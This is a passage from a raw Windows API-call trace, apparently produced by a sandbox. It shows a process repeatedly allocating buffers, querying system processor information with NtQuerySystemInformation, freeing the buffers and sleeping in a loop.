Flags=0x0, Size=0xc0) returned 0x295cb58 [0273.192] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0273.193] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.194] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.194] Sleep (dwMilliseconds=0x110) [0273.200] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0273.200] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0273.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0273.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0273.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0273.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0273.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0273.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0273.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.208] Sleep (dwMilliseconds=0x110) [0273.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0273.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0273.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0273.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0273.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0273.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0273.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0273.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0273.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.252] Sleep (dwMilliseconds=0x110) [0273.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0273.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0273.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0273.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0273.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0273.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0273.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0273.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0273.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.286] Sleep (dwMilliseconds=0x110) [0273.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0273.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0273.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0273.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0273.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0273.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0273.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0273.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0273.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.300] Sleep (dwMilliseconds=0x110) [0273.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0273.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0273.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0273.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0273.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0273.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0273.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0273.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0273.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.327] Sleep (dwMilliseconds=0x110) [0273.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0273.341] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.341] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0273.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0273.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0273.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0273.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0273.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0273.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0273.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.344] Sleep (dwMilliseconds=0x110) [0273.358] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0273.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0273.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0273.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0273.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0273.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0273.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0273.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0273.366] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.366] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.367] Sleep (dwMilliseconds=0x110) [0273.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0273.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0273.381] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0273.381] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.381] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0273.381] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0273.381] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.382] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0273.382] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0273.382] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.383] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0273.383] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.383] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.383] Sleep (dwMilliseconds=0x110) [0273.397] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0273.397] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.398] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0273.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0273.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0273.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0273.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0273.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0273.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0273.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.413] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.413] Sleep (dwMilliseconds=0x110) [0273.428] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0273.428] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.428] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0273.428] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0273.428] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.429] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0273.429] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0273.429] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.430] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0273.430] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0273.430] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.431] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0273.431] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.432] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.432] Sleep (dwMilliseconds=0x110) [0273.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0273.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0273.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0273.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0273.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0273.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0273.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0273.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0273.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.439] Sleep (dwMilliseconds=0x110) [0273.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0273.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0273.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0273.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0273.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0273.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0273.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0273.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0273.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.800] Sleep (dwMilliseconds=0x110) [0273.809] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0273.809] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.810] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0273.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0273.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0273.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0273.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0273.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0273.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0273.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.812] Sleep (dwMilliseconds=0x110) [0273.825] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0273.825] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0273.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0273.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0273.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0273.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.827] HeapFree (in: hHeap=0x2560000, 